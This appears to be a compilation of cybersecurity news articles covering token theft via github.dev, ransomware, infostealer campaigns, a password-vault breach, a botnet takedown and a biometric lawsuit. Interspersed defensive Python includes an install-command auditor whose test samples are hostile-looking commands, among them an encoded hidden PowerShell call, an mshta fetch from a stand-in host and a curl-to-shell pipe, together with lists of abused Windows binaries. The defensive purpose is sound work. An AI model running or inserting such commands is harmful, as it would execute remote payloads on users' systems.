The published demonstration shows how malicious JavaScript running inside a webview can trigger actions within the main editor window. By simulating keyboard input and user activity, the code can install a malicious extension without requiring the victim to manually perform the installation process.

Once deployed, the extension is capable of extracting a GitHub OAuth token that is transmitted when users access github.dev. OAuth tokens act as authorization credentials that allow applications to interact with GitHub services on behalf of authenticated users.

According to the researcher, the security concern extends beyond access to a single repository. The token passed to github.dev can inherit the permissions associated with the user's GitHub account, potentially granting access to every repository available to that account, including private projects.

Using the proof-of-concept attack, a malicious extension can retrieve the token and communicate with GitHub's API. This allows an attacker to identify repositories accessible to the compromised account and gather information about private development resources.

Askar argued that the broad permissions associated with the token significantly increase the potential impact of exploitation because access is not limited to the repository that initially triggered the github.dev session.

To reduce exposure while no official fix was available, the researcher advised users to clear cookies and locally stored site data associated with github.dev. Removing this stored data forces additional authentication checks that can help expose suspicious sign-in attempts.

After clearing the stored information, users attempting to access github.dev through a malicious link would be more likely to encounter a warning indicating that the GitHub Repositories extension is requesting authorization through GitHub. Such prompts can serve as an indication that unexpected account access is being requested.

The disclosure also highlighted ongoing tensions surrounding vulnerability reporting processes. Askar stated that GitHub was notified approximately one hour before publication of the research. He described the disclosure as a deliberate decision to release the information publicly rather than pursue a lengthy coordinated disclosure process.

The researcher cited previous interactions involving another VS Code vulnerability that he reported through Microsoft's security channels. According to his account, the issue was later addressed without attribution and was classified as having no security impact despite his concerns regarding its implications.

Askar said that experience influenced his decision to publicly disclose future VS Code security findings rather than continue working through Microsoft's reporting process.

The incident follows several other public disclosures involving Microsoft products by an independent researcher operating under the online alias "Nightmare Eclipse." Over recent months, that researcher has released details regarding multiple unpatched vulnerabilities affecting Windows and related Microsoft technologies, including flaws known as BlueHammer, RedSun, GreenPlasma, MiniPlasma, YellowKey, and UnDefend.

Some of those vulnerabilities were later reported as being actively exploited, further intensifying discussions within the security community about vulnerability handling, disclosure timelines, and communication between vendors and independent researchers.

Microsoft previously responded to some of those disclosures by warning that legal action could be considered when individuals engage in activities that cause harm to customers. The company also stated that it may cooperate with law enforcement agencies when necessary.

In comments provided following the publication of the VS Code findings, Microsoft emphasized the role independent researchers play in improving product security. The company stated that it remains committed to evaluating reported issues, coordinating engineering responses, and delivering mitigations intended to protect customers.

A subsequent statement from Microsoft indicated that the issue had been mitigated within its services and that users were not required to take additional action.

Developer-focused platforms remain attractive targets because authentication tokens can provide access to source code repositories, development environments, and organizational assets. Security teams generally recommend reviewing unexpected links carefully, limiting unnecessary permissions, monitoring account activity, and using strong authentication controls to reduce the likelihood of unauthorized access.

Healthcare Cyber Breach Raises Concerns After 33,000 Patients Affected


Initially perceived as a supply-chain disruption within the UK healthcare ecosystem, the ransomware attack has now revealed an even more severe and long-lasting impact on patient privacy. Two years after the cybercriminal attack on pathology services provider Synnovis, Bedfordshire Hospitals NHS Foundation Trust has confirmed that sensitive data relating to over 33,000 individuals was stolen and published.

The exposed records come from administrative pathology files associated with laboratory and diagnostic testing conducted between 2011 and 2020, and may contain personal information and clinical test results. 

Although ransomware incidents are most often associated with operational disruption, they also present long-term data protection challenges for healthcare organizations. Moreover, attacks on critical third-party suppliers supporting essential NHS services pose cascading risks. Following the June 2024 ransomware incident, Synnovis and the relevant healthcare organizations conducted an extensive forensic review to determine the extent of the exposure.

Bedfordshire Hospitals Foundation Trust informed the affected individuals after receiving confirmation that data associated with approximately 32,927 patients had been identified in material exfiltrated by the attackers and distributed on dark web sites. According to the trust, delayed disclosure was primarily driven by the complexity of the investigation rather than a newly discovered breach. This compromised dataset consisted of fragmented administrative records dispersed across several sources, as opposed to conventional datasets stored in structured repositories. For the contents and organizational ownership of these files to be determined, more than a year of specialist analysis was required. 

According to the review, historical pathology-related information spanning nearly a decade before November 2020 may have been exposed, including patient names, dates of birth, NHS and patient identification numbers, postcodes, and diagnostic test results. Cyber incidents involving unstructured healthcare data are difficult to assess because the stolen information must be accurately mapped before its full impact on affected individuals can be understood. Once notifications had been sent to the affected individuals, the focus shifted from forensic reconstruction to risk mitigation.

Bedfordshire Hospitals Foundation Trust urged patients to remain vigilant for suspicious communications, advising them not to respond to unexpected requests for personal information, to avoid opening attachments or links from sources that are unfamiliar, and to be cautious when receiving unsolicited phone calls, emails, or text messages that reference healthcare information. 

The trust acknowledged that disclosures of this kind may cause concern; however, it emphasised that the compromise originated in an external pathology supplier's systems rather than its own network infrastructure, and reiterated its commitment to supplier oversight and data protection governance. Cybersecurity professionals have nonetheless criticised the delay in disclosure.

Saif Abed, founding partner of the AbedGraham Group, has argued that a two-year gap between the incident and patient notification raises serious questions about the accountability of all organizations involved. He also challenged suggestions that the fragmented nature of the stolen records significantly reduces risk: in his view, modern threat actors are well equipped to aggregate, analyse, and correlate disparate datasets.

In Abed's opinion, once healthcare data enters criminal ecosystems it becomes more likely to be misused as time passes, not less. This leaves affected individuals with limited recourse and raises the question of whether systemic lessons from the Synnovis incident have been adequately addressed. Several of these concerns echo those he raised last year when calling for a formal public inquiry into the ransomware attack, relating to third-party cyber risk, breach transparency, and the resilience of critical healthcare supply chains. Even after disrupted systems are restored and headlines fade, the consequences of cyberattacks often persist.

Healthcare organizations depend on complex networks of third-party providers, so visibility into supply chain security, timely breach assessment, and transparent communication remain critical to cyber resilience. The case shows that patients need to stay vigilant against phishing attempts and identity-based fraud, while healthcare leaders must continuously monitor the external partners that handle sensitive information.

This incident demonstrates that maintaining patient trust throughout the healthcare ecosystem involves much more than simply adhering to technical requirements.

WeedHack Malware Infects Over 116,000 Minecraft Players Through Fake Mods and Cheats


Early this year, a large-scale digital attack named WeedHack began spreading, tricking more than 116,000 Minecraft players worldwide. Instead of harmless add-ons, what seemed like useful mods carried hidden malicious software. Often, victims found these files through deceptive video guides or altered web searches promising better performance. Behind the scenes, once installed, the malware quietly pulled usernames, passwords, and crypto wallets from infected devices. 

Though warnings have been issued, experts confirm the operation is still active and steadily expanding its reach. According to McAfee, over 116,000 devices now show signs of intrusion by WeedHack, with between two thousand and three thousand fresh infections recorded daily. The United States, Germany, India, and the United Kingdom account for most affected users. Analysis revealed a network built on over 240 harmful web links, and close to 3,820 distinct JAR files were tied directly to distribution efforts.

YouTube dominates how users encounter these threats, alongside skewed search outcomes. Hidden inside video descriptions or comment sections, harmful links promote counterfeit Minecraft modifications. Appearances deceive - some productions include polished narration and real-looking game scenes. Their legitimacy grows when large audiences watch, boosting visibility for players seeking add-ons. Not stopping there, attackers also twist how search results appear. 

When someone looks up reliable software such as Meteor Client or Radium Client, fraudulent pages rise to the front. Because real modifications often live solely on GitHub without proper web addresses, fraudsters take advantage of that emptiness. Looking nearly identical to authentic sources, these imitation platforms blur the line between secure and risky picks. 

Surprisingly, McAfee spotted a harmful website showing alerts about counterfeit Skytils downloads - yet it also included links to authentic GitHub and Discord sources. Even though the layout seemed reliable, visitors were handed corrupted files without their knowledge. Users ended up running malicious software, misled by the site’s convincing appearance. Unlike most infostealers, WeedHack runs in plain sight - offering its tools via a malware-for-hire model. 

Its visible control panel allows access to compromised systems. Data taken from victims appears there, clear and sorted. From that interface, new harmful setup files can be built, targeting Minecraft builds numbered 1.21.0 up to 1.21.10. Stolen details include Minecraft session tokens, saved browser passwords, and active cookies. Access extends to Discord, Steam, Telegram logins without consent. 

Cryptocurrency wallets are targeted too, with data pulled silently, and screenshots captured behind the user's back round out the basic feature set. A paid tier, priced at five dollars monthly or twenty-five dollars as a one-time purchase, unlocks additional capabilities: remote desktop viewing, webcam operation, continuous keystroke recording, control over the victim's command line, and remote file management.

Over eight hundred members are part of WeedHack’s Telegram community, studies indicate. Though some seem underage, a number act through its online interface to target others or access personal data. Most security specialists suggest grabbing mods solely from verified platforms, checking URLs thoroughly - while skipping any JARs sitting on shady domains. When it comes to add-ons with fewer dangers, Minecraft’s built-in marketplace tends to be the safest path available.

Hackers Exploit Fake Claude Code Installers and Install Malware


Developers looking up Claude Code deployment instructions could be lured into an advanced malware campaign that disguises itself as genuine AI tooling documentation.


Experts found a few fake Claude Code and developer platform websites built to steal credentials, cryptocurrency, and API keys.

Straiker researchers wrote in their analysis of the campaign: “The attack chain runs on the same unchecked trust that makes AI developer tools so easy to adopt. You copy a command. You paste it in your terminal. By then, it’s already too late.”

Highlights of the fake Claude code campaign 

1. Experts found over 88 fake domains mimicking Claude Code and other developer sites. The campaign uses SEO poisoning and Google ads to rank malicious install pages above genuine documentation.

2. Threat actors hide malicious commands inside otherwise genuine installation commands, without disrupting the expected deployment process.

3. The malware specifically targets AI-related assets such as cloud development credentials, API keys, and authentication tokens.

About the credential theft campaign 

The campaign attacked users of famous AI and developer tools, such as Claude Code, JetBrains, Perplexity Comet, and Cline. 

According to the experts, the operation relies on over 88 domains hosted across legitimate platforms and constantly shuffles its infrastructure, allowing malicious sites to resurface immediately after takedowns. To trap targets, the threat actors use redirect chains, SEO poisoning, and paid Google ads that place fraudulent installation pages above genuine documentation in search results.

These websites closely impersonate genuine vendor resources and demonstrate installation commands that look genuine but include hidden separators, such as “&,” that launch malicious actions along with the expected software deployment.

In many cases the genuine command still completes successfully, which helps conceal the compromise.

Delivery of malware and launch tactics

Experts found various delivery techniques, such as rundll32.exe loading infected DLLs, Base64-encoded commands, mshta.exe abuse, JavaScript-based payloads, and GitHub-hosted scripts. 

These techniques improve the attackers' chances of evading conventional detection tools. Unlike typical infostealers, the campaign targets AI assets such as authentication tokens, API keys, and cloud development credentials from tools like Continue[.]dev and Cline.

After execution, the malware uses a multi-level malicious chain that features encoded C2 communications, anti-analysis capabilities, fileless execution tactics, and credential theft functions.

Experts identified the primary payload as ACRStealer, an information-stealing malware family that has evolved to include sophisticated encryption and evasion techniques. They also found a cryptocurrency clipboard hijacker that redirects transactions by replacing copied wallet addresses.
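A pre-paste audit of a copied install command, covering both the hidden-separator trick in the installation commands and the rundll32/mshta/Base64 delivery techniques described above. This is an added example, not Straiker's or Anthropic's code; the "genuine" command is assumed to be the vendor-documented one, the tampered commands are constructed, and the Base64 blob encodes nothing but a harmless Write-Host.

```python
"""Pre-paste audit of a copied install command.

Added example. It checks for the tricks the campaign is described as using:
a second command spliced in after the genuine install step with a shell
separator, Base64-encoded command blobs, and living-off-the-land binaries
such as mshta.exe and rundll32.exe. All sample commands are constructed.
"""
import base64
import re

# Separators that let a second command ride along with the genuine one.
CHAIN_OPERATORS = re.compile(r"(&&|\|\||;|\||&)")
# Windows binaries commonly abused to launch a payload from a one-liner.
LOLBINS = ("mshta", "rundll32", "regsvr32", "certutil", "bitsadmin")
ENCODED_SWITCH = re.compile(r"-(?:e|ec|enc|encodedcommand)\b", re.IGNORECASE)
BASE64_RUN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")
DOWNLOAD_EXEC = re.compile(
    r"\b(curl|wget|iwr|invoke-webrequest)\b.*\|\s*(sh|bash|iex|powershell)\b",
    re.IGNORECASE)
# Zero-width and similar characters that can hide text in copied commands.
INVISIBLE = {"\u200b", "\u200c", "\u200d", "\u2060", "\ufeff"}


def split_commands(cmd: str) -> list[str]:
    """Split on shell chaining operators and return the command segments.
    An unquoted '&' inside a URL query string is a known false positive."""
    parts = [p.strip() for p in CHAIN_OPERATORS.split(cmd)]
    return [p for p in parts if p and not CHAIN_OPERATORS.fullmatch(p)]


def audit_command(cmd: str, expected_prefix: str) -> list[str]:
    """Findings for a pasted command; an empty list means it matches expectations."""
    findings = []
    if any(ch in cmd for ch in INVISIBLE):
        findings.append("contains invisible Unicode characters")
    segments = split_commands(cmd)
    if not segments or not segments[0].startswith(expected_prefix):
        findings.append("first command is not the documented install command")
    if len(segments) > 1:
        findings.append(f"{len(segments) - 1} extra command(s) chained after "
                        f"the install step: {segments[1:]}")
    for seg in segments:
        for binary in LOLBINS:
            if re.search(rf"\b{binary}(\.exe)?\b", seg, re.IGNORECASE):
                findings.append(f"invokes {binary}")
        if ENCODED_SWITCH.search(seg) or BASE64_RUN.search(seg):
            findings.append("carries an encoded/Base64 command payload")
    if DOWNLOAD_EXEC.search(cmd):
        findings.append("downloads and executes remote content in one step")
    return findings


# Constructed samples. GENUINE is assumed to be the vendor-documented command.
GENUINE = "npm install -g @anthropic-ai/claude-code"
HARMLESS_BLOB = base64.b64encode(
    "Write-Host 'constructed sample'".encode("utf-16le")).decode()
TAMPERED_ENCODED = f"{GENUINE} & powershell -w hidden -enc {HARMLESS_BLOB}"
TAMPERED_LOLBIN = f"{GENUINE} && mshta https://docs.example.invalid/setup.hta"
PIPED_INSTALLER = "curl -fsSL https://docs.example.invalid/install.sh | sh"

if __name__ == "__main__":
    for sample in (GENUINE, TAMPERED_ENCODED, TAMPERED_LOLBIN, PIPED_INSTALLER):
        print(sample[:60], "->", audit_command(sample, GENUINE) or ["clean"])
```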

Hackers Steal Encrypted Password Vaults in Dashlane Attack


Dashlane’s June 2026 breach is a reminder that even password managers can become targets when attackers focus on account access rather than the encrypted vault itself. In this case, hackers used brute-force attacks against Dashlane’s two-factor authentication flow, gained access to a small number of customer accounts, and downloaded encrypted password vaults. 

According to Dashlane’s disclosure, the attackers targeted the device-registration process, which lets a new phone or computer be added to an account after verification. Dashlane said the campaign affected about 20 customer accounts and resulted in at least a dozen encrypted vaults being copied, while the company’s own infrastructure was not compromised. 

The good news is that the stolen vaults are still encrypted and cannot be opened without each user’s master password. Dashlane’s zero-knowledge design means it does not store master passwords in plaintext, so the immediate risk depends heavily on how strong and unique the user’s master password is. That said, the incident still matters because an encrypted vault can be dangerous if the master password is weak, reused, or already exposed elsewhere. Security researchers also noted the broader lesson: once attackers have a copy of the vault, they can attempt offline cracking without triggering more defenses on the service side. 

For users, the safest response is to change the master password to a long, unique passphrase, review recently registered devices, and reset any sensitive accounts stored in the vault, starting with email, banking, and identity services. It is also wise to use phishing-resistant 2FA such as a hardware security key where possible, and watch for suspicious password-reset emails for the next few weeks.
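The control the device-registration brute force above calls for, as an added example: a one-time-code check with a fixed guess budget per code, a short code lifetime, a constant-time comparison and an account lockout. This is illustrative code written for this page; it makes no claim about how Dashlane's own flow is built, and the account names and clock values are constructed.

```python
"""Rate-limited one-time-code check for a device-registration step.

Added example: a guess budget per issued code, a short code lifetime and an
account lockout, so that brute-forcing the second factor is not feasible.
Not Dashlane's code; purely illustrative.
"""
import hmac
import secrets
import time

CODE_DIGITS = 6
CODE_TTL_SECONDS = 300       # a code stops being valid after five minutes
MAX_ATTEMPTS_PER_CODE = 5    # at most 5 guesses against any one code
LOCKOUT_SECONDS = 900        # exhausting the budget locks registration


class DeviceRegistrationVerifier:
    """Tracks pending codes and enforces the guess budget per account."""

    def __init__(self, now=time.time):
        self._now = now                 # injectable clock for tests
        self._pending = {}              # account -> [code, issued_at, attempts]
        self._locked_until = {}         # account -> unlock timestamp

    def is_locked(self, account: str) -> bool:
        return self._locked_until.get(account, 0) > self._now()

    def has_pending(self, account: str) -> bool:
        return account in self._pending

    def issue_code(self, account: str) -> str:
        """Create a fresh code for out-of-band delivery (push, email, SMS)."""
        if self.is_locked(account):
            raise PermissionError("device registration temporarily locked")
        code = f"{secrets.randbelow(10 ** CODE_DIGITS):0{CODE_DIGITS}d}"
        self._pending[account] = [code, self._now(), 0]
        return code

    def verify(self, account: str, submitted: str) -> bool:
        """True only for an unexpired code within budget; success consumes it."""
        if self.is_locked(account):
            return False
        entry = self._pending.get(account)
        if entry is None:
            return False
        code, issued_at, _ = entry
        if self._now() - issued_at > CODE_TTL_SECONDS:
            del self._pending[account]
            return False
        entry[2] += 1
        # Constant-time comparison avoids leaking matching digits via timing.
        if hmac.compare_digest(code.encode(), str(submitted).encode()):
            del self._pending[account]
            return True
        if entry[2] >= MAX_ATTEMPTS_PER_CODE:
            del self._pending[account]
            self._locked_until[account] = self._now() + LOCKOUT_SECONDS
        return False


def guesses_evaluated(verifier, account, guesses) -> int:
    """How many guesses the verifier even evaluates before the account locks."""
    evaluated = 0
    for guess in guesses:
        if verifier.is_locked(account) or not verifier.has_pending(account):
            break
        evaluated += 1
        verifier.verify(account, guess)
    return evaluated


if __name__ == "__main__":
    v = DeviceRegistrationVerifier()
    real = v.issue_code("demo-account")
    # A 6-digit code allows a million values; only five are ever evaluated.
    print("guesses evaluated:", guesses_evaluated(v, "demo-account",
                                                  (f"{i:06d}" for i in range(10 ** 6))))
    print("locked:", v.is_locked("demo-account"), "correct code now accepted:",
          v.verify("demo-account", real))
```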

Ransomware Revenues Climb as Criminal Networks Expand and Adapt like unwanted vines


Ransomware operators continue to generate substantial profits, with new research from Rapid7 indicating that several cybercrime groups are recording revenue growth that outpaces many publicly traded businesses.

According to the cybersecurity firm's analysis, ransomware groups collectively received an estimated $529.2 million during the first quarter of 2026. That figure represents a 39% increase compared with the same period a year earlier. Rapid7 noted that none of the companies within the FTSE 350 index reported year-over-year revenue growth exceeding 30% during that quarter, placing ransomware operators among the fastest-growing entities examined in the study.

Several well-established ransomware operations appear to be benefiting from this trend. Rapid7 estimates that the Qilin ransomware group generated approximately $193 million between July 2025 and March 2026. During the same period, the Gentleman group is estimated to have collected roughly $52 million in ransom payments.

Rapid7 researchers argue that modern ransomware operations bear little resemblance to the stereotype of small groups of hackers working independently. Instead, many function through interconnected networks of specialists who focus on specific stages of an attack. Some actors gain access to victim networks, others develop malware, while separate teams handle extortion demands and payment negotiations.

A major factor behind this growth is the emergence of Initial Access Brokers, or IABs. These actors specialize in obtaining access to corporate networks and then selling that access to other criminals. As a result, launching a ransomware attack no longer requires extensive technical expertise. Access to compromised systems, attack tools, and even managed cybercrime services can now be purchased through underground marketplaces.

Researchers say this division of labor has created a more structured criminal economy. Different groups contribute individual services, allowing ransomware campaigns to operate through networks that resemble commercial supply chains rather than isolated criminal crews.

The study also highlights the resilience of these operations. Infrastructure used by ransomware groups, including servers, data leak platforms, and victim negotiation portals, can often be restored quickly after disruptions. Law enforcement agencies, meanwhile, frequently require lengthy investigations and international coordination before conducting enforcement actions. This difference in speed allows many criminal networks to continue operating even when portions of their infrastructure are removed.

Rapid7 CTO EMEA Thom Langford said ransomware groups have demonstrated an ability to continue generating revenue despite disruptions because their operations are designed to function even when individual components are taken offline. In many cases, the removal of a single server or criminal group does not significantly affect the broader ecosystem supporting ransomware activity.

The findings come amid continued financial losses linked to cybercrime. According to the FBI's Internet Crime Complaint Center, organizations and individuals reported more than $16 billion in cybercrime losses during 2024, reflecting the growing economic impact of digital fraud, extortion, and network intrusions.

To reduce ransomware risk, Rapid7 recommends that organizations continuously review their exposed systems and identify weaknesses that could provide attackers with an entry point. Particular attention should be given to misconfigured services, overlooked assets, and internet-facing systems, which are frequently targeted by Initial Access Brokers seeking access to corporate environments.

The company also advises security teams to make greater use of threat intelligence to understand how attackers operate, including the infrastructure, tools, and access methods commonly used during intrusions. Researchers further recommend strengthening identity security through tighter access controls, least-privilege policies, and monitoring for signs that employee credentials have been stolen, resold, or abused.

According to Rapid7, disrupting ransomware attacks before attackers establish access remains one of the most effective defensive strategies. By identifying weaknesses early and restricting opportunities for credential theft, organizations may be able to prevent ransomware incidents before they progress to the extortion stage.

Amazon Faces Lawsuit Over Ring Facial Recognition Practices


Face recognition capabilities are increasingly integrated into consumer surveillance platforms, prompting increased legal scrutiny over Amazon's Ring division's handling of biometric information. Newly filed lawsuits allege that Ring's optional "Familiar Faces" feature captures, processes, and stores facial images without obtaining consent from each individual who may have their likeness recorded. 

The lawsuit raises questions about privacy compliance, biometric data governance, and the legal boundaries of AI-driven identification technologies. The complaint, filed by a Virginia resident seeking class-action status and substantial damages, places one of the most widely used smart doorbell ecosystems at the center of an escalating debate over how companies balance convenience with security and data protection.

Charles Sigwalt, who initiated the proposed class-action lawsuit in Seattle, is at the center of the legal challenge. Under Ring's "Familiar Faces" technology, individuals within range of compatible doorbell cameras are scanned and classified using artificial intelligence. Sigwalt claims that the feature generates and retains a unique template of each individual's face that may be used to identify the same person in future encounters.

Sigwalt claims this process occurred while he was visiting friends and relatives who used Ring devices, and that he received no notice that his biometric information was being captured or processed during those visits. The lawsuit further alleges that the company continues to retain such data, and asserts that the individuals recorded by the system did not consent to its collection.

Although Amazon did not respond to the allegations, this case highlights the technical operation of Ring's "Familiar Faces" feature that was introduced in September 2025 as an optional tool to enhance visitor notifications. 

By replacing generic alerts with personalized ones, the system enables cameras to recognize recurring visitors over time and send notifications that use their names instead of the usual motion or presence alerts. While Ring says the feature can be enabled or disabled by the user at any time, the lawsuit raises broader questions about whether consent mechanisms adequately cover the biometric data of individuals who do not own the device but may still be subjected to facial recognition analysis.

Additionally, the complaint asserts that the collection of facial recognition data extends beyond Ring device owners and may affect individuals who pass through camera-monitored entryways without their knowledge or consent.

The filing states that millions of people may have had their facial images captured simply by appearing within the viewing area of Ring-equipped properties, raising questions about the extent of biometric data collection in residential surveillance settings. Amazon declined to comment on the litigation, but the case adds to a growing list of privacy challenges for Ring since Amazon acquired the smart security company for $1 billion in 2018.

Ring also faced criticism months ago over its neighborhood camera network feature, which was promoted during the Super Bowl as a way to help users locate missing pets. The initiative proved controversial: privacy advocates and some users warned that expanding interconnected camera coverage could result in broader surveillance of public spaces and residential communities than the initiative's stated objective would require.

Both controversies emphasize the increased scrutiny that has been focused on the deployment of networked surveillance and the handling of biometric information on a large scale by regulators and the public. Increasingly, consumer security products are providing features such as biometric recognition and artificial intelligence-driven surveillance. 

The legal challenge filed against Ring demonstrates the growing tension between the advancement of technology and the protection of individual privacy. In this case, the outcome could affect the development of facial recognition systems, biometric data management, and the process by which organizations obtain meaningful consent from individuals who are likely to be captured by connected devices. 

As intelligent surveillance technologies continue to evolve, transparency, data governance, and privacy-by-design principles remain essential safeguards for consumers and corporations alike.

Dutch Authorities Dismantle Massive Botnet Network Linked to 17 Million Compromised Devices
Dutch authorities have shut down what is believed to be one of the largest botnet operations ever uncovered, disrupting a cybercrime network that compromised more than 17 million internet-connected devices globally. The affected devices reportedly included computers, smartphones, tablets, security cameras, and other connected hardware that were unknowingly used to facilitate large-scale cyberattacks.

According to Dutch investigators, approximately 200 servers located in the Netherlands were seized as part of the operation. These servers allegedly formed the backbone of a sophisticated botnet infrastructure that transformed infected devices into components of a residential proxy network.

A botnet is a collection of compromised devices that cybercriminals can remotely control after infecting them with malware. Such networks are commonly used to launch Distributed Denial of Service (DDoS) attacks, distribute phishing campaigns, send spam, commit fraud, and conceal the origins of malicious online activities.

Dutch media outlet NL Times reported that cybercriminals targeted devices with weak security protections, converting them into nodes within a residential proxy service. Once infected, the devices were used to redirect internet traffic and allegedly help "launch large-scale cyberattacks" without the owners' knowledge. Authorities confirmed that the network has now been taken offline.

The investigation began after a cybersecurity researcher working with the National Cyber Security Centre (NCSC) identified suspicious activity linked to the botnet. The NCSC, which operates under the Netherlands' Ministry of Justice and Security, subsequently partnered with Dutch law enforcement agencies to investigate the case. Their efforts led to the identification and seizure of the servers supporting the operation.

While authorities have not disclosed the exact method used to infect more than 17 million devices, cybersecurity experts note that botnets are commonly spread through malicious applications, software vulnerabilities, phishing campaigns, and brute-force attacks.

The dismantled network has reportedly been linked by NL Times to Asocks, a residential proxy service that has previously faced scrutiny over alleged connections to botnet-related activities. However, Dutch police have not officially confirmed any association.

In 2024, cybersecurity company HUMAN reported that a botnet known as Proxylib had infected nearly 190,000 devices and integrated them into Asocks' proxy network. Researchers connected that operation to a discontinued VPN service and at least 28 Android applications.

Residential proxy services route internet traffic through the IP addresses of ordinary users, making online activity appear to originate from legitimate residential locations. While such services can have lawful uses, including bypassing geographic restrictions, experts warn that they are increasingly being exploited by cybercriminals.

Following the takedown, the NCSC updated its guidance on residential proxy networks and highlighted the risks they pose. In an updated statement, the agency said the enforcement action "demonstrates" how residential proxies pose "a threat to national and international cybersecurity."

The agency further warned that the technique is "being deployed more and more frequently in digital attacks," enabling activities such as DDoS attacks, phishing campaigns, credential theft, brute-force attacks, malware distribution, and SMS pumping.

The operation reflects a broader international effort to combat cybercrime infrastructure. In March, authorities from Germany, Canada, and the United States coordinated actions against two major botnets known as "Aisuru" and "Kimwolf," which were allegedly responsible for large-scale DDoS attacks. U.S. authorities reported that those networks had compromised more than three million devices.

Earlier this year, Google disrupted the IPIDEA proxy network, whose development kits were reportedly used by the Kimwolf botnet. Separately, the Netherlands' Fiscal Information and Investigation Service (FIOD) seized more than 800 servers connected to an illegal hosting platform allegedly used for botnet and malware-related activities.

Cybersecurity experts continue to advise users to strengthen their digital defenses by creating strong passwords, regularly updating software, monitoring network activity, enabling WPA2 or WPA3 Wi-Fi security protocols, and avoiding downloads from unverified sources. Users are also encouraged to carefully review application permissions and terms of service to ensure their devices are not unknowingly enrolled in proxy networks. Traditional antivirus protection remains an important layer of defense against evolving cyber threats.
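The article describes how a residential proxy network relays strangers' traffic through the IP addresses of ordinary home devices, and it advises users to monitor network activity so their devices are not unknowingly enrolled. The following is an added example, not code from the article, the NCSC, or any vendor: a small Python heuristic that profiles per-device outbound flows and flags a device whose egress looks like proxy relaying (many distinct remote destinations and ports, and an outbound byte volume that rivals inbound). The flow records, device addresses and thresholds are all constructed for this illustration and should be tuned for a real home or small-office network.

```python
"""Heuristic detector for proxy-node-like egress from a home network device.

Constructed example for illustration; not part of the original article.

A device relaying traffic for a residential proxy service tends to show, over a
short window:
  * many distinct remote destinations, on many distinct remote ports,
  * outbound bytes that rival or exceed inbound bytes,
  * connections unrelated to the device's normal role (a security camera
    should mostly talk to its vendor's cloud, not hundreds of unrelated hosts).
This script summarises flow records per device and scores them on those traits.
"""
from collections import defaultdict
from dataclasses import dataclass, field


@dataclass(frozen=True)
class Flow:
    src: str        # internal device IP
    dst: str        # remote IP the device connected to
    dport: int      # remote port
    bytes_out: int  # bytes sent by the device
    bytes_in: int   # bytes received by the device


@dataclass
class DeviceProfile:
    flows: int = 0
    bytes_out: int = 0
    bytes_in: int = 0
    dsts: set = field(default_factory=set)
    ports: set = field(default_factory=set)


# Thresholds are assumptions chosen for this constructed sample; tune for a real LAN.
MIN_DISTINCT_DSTS = 50     # ordinary home devices rarely reach this many hosts quickly
MIN_DISTINCT_PORTS = 5     # relayed traffic spans mail, web, alt-HTTP and other ports
MIN_OUT_IN_RATIO = 0.8     # home devices are usually download-heavy; relays are not


def profile_flows(flows):
    """Aggregate flow records into one DeviceProfile per internal source IP."""
    profiles = defaultdict(DeviceProfile)
    for f in flows:
        p = profiles[f.src]
        p.flows += 1
        p.bytes_out += f.bytes_out
        p.bytes_in += f.bytes_in
        p.dsts.add(f.dst)
        p.ports.add(f.dport)
    return profiles


def suspicious_devices(flows):
    """Return {device_ip: [reasons]} for devices matching at least two proxy-like traits."""
    findings = {}
    for src, p in profile_flows(flows).items():
        reasons = []
        if len(p.dsts) >= MIN_DISTINCT_DSTS:
            reasons.append(f"{len(p.dsts)} distinct destinations")
        if len(p.ports) >= MIN_DISTINCT_PORTS:
            reasons.append(f"{len(p.ports)} distinct remote ports")
        ratio = p.bytes_out / p.bytes_in if p.bytes_in else float("inf")
        if ratio >= MIN_OUT_IN_RATIO:
            reasons.append(f"out/in byte ratio {ratio:.2f}")
        if len(reasons) >= 2:  # require two traits to limit false positives
            findings[src] = reasons
    return findings


def build_sample_flows():
    """Constructed sample: one ordinary laptop and one camera behaving like a proxy node."""
    flows = []
    # Laptop (192.168.1.10): a handful of web destinations, download-heavy.
    for i in range(8):
        flows.append(Flow("192.168.1.10", f"203.0.113.{i + 1}", 443,
                          bytes_out=4_000, bytes_in=120_000))
    # Camera (192.168.1.20): one legitimate vendor-cloud flow ...
    flows.append(Flow("192.168.1.20", "198.51.100.5", 443, bytes_out=2_000, bytes_in=1_000))
    # ... followed by relayed traffic to many unrelated hosts on varied ports.
    relay_ports = [80, 443, 8080, 25, 587, 993, 5222, 3128]
    for i in range(120):
        flows.append(Flow("192.168.1.20", f"192.0.2.{i + 1}", relay_ports[i % len(relay_ports)],
                          bytes_out=30_000, bytes_in=28_000))
    return flows


if __name__ == "__main__":
    for device, reasons in suspicious_devices(build_sample_flows()).items():
        print(f"{device}: {'; '.join(reasons)}")
```

On the constructed sample the laptop matches none of the traits, while the camera matches all three and is reported. In practice the flow records would come from a router's NetFlow/IPFIX export or a firewall log, and a hit on a device that has no business reaching many unrelated hosts is a cue to isolate it, update its firmware and review the applications or SDKs installed on it.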

Debate Intensifies Over CEO Accountability in Cybersecurity Breaches
A growing debate is emerging around whether chief executives should be held directly accountable when companies suffer cyberattacks. Some experts argue that CEOs must face severe consequences, including automatic dismissal after a major breach, while others warn that such a policy could create dangerous incentives and worsen crisis management.

One viewpoint insists that cybersecurity failures are ultimately leadership failures. Security executives, according to this argument, often act as “bullet fodder” despite lacking control over budgets, risk appetite, or enforcement across business units. They can identify risks and recommend action, but final decisions rest with company leadership.

“CEOs should absolutely be held accountable for a cyberattack. In fact, I would go even further: when there’s a breach, defined as a system being compromised or data being stolen, the CEO should be automatically fired as a result.”

Supporters of stricter accountability say catastrophic breaches can damage customers, employees, supply chains, and the broader business ecosystem. When leadership underfunds security or ignores warnings, they argue, that is a deliberate business choice. They compare major cyber incidents to executive negligence in other corporate functions and suggest boards should establish predefined thresholds for breaches that automatically trigger CEO removal.

Another key point in this camp is incentives. Cyber resilience and risk reduction, advocates say, should be tied directly to executive compensation and employee bonuses so that cybersecurity becomes a company-wide priority rather than a secondary concern.

“When failure carries no personal cost for leadership, accountability shifts downward. Personal accountability at CEO level restores seriousness to cyber risk and aligns decision-making with real-world consequences for all stakeholders.”

However, critics argue that making CEOs personally liable for every breach could backfire. Cyberattacks vary widely in method and speed, and breaches can spread through networks within minutes. During the immediate aftermath, companies need rapid containment and transparent communication with affected parties.

Opponents warn that harsh personal penalties could encourage executives to conceal incidents or delay disclosure out of fear for their own careers. They also point out that cybercriminals might exploit this pressure by attempting to extort CEOs personally in exchange for silence about an attack.

“The focus should be on identifying and penalising the perpetrators, not the victims.”

